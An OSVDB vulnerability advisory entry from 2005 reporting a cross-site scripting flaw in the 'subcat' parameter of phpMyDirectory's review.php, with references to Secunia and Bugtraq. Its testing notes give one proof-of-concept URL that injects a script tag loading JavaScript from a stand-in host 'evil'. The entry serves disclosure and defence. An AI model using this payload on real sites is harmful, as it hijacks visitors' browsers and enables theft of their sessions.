phpMyDirectory review.php subcat Variable XSS

2005-03-25T06:42:30
ID OSVDB:15067
Type osvdb
Reporter OSVDB
Modified 2005-03-25T06:42:30

Description

Manual Testing Notes

http://[victim]/review.php?id=1&cat=&subcat="><script src=http://evil/foo.js></script>

References:

Vendor URL: http://www.phpmydirectory.com/ Secunia Advisory ID:14692 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-03/0432.html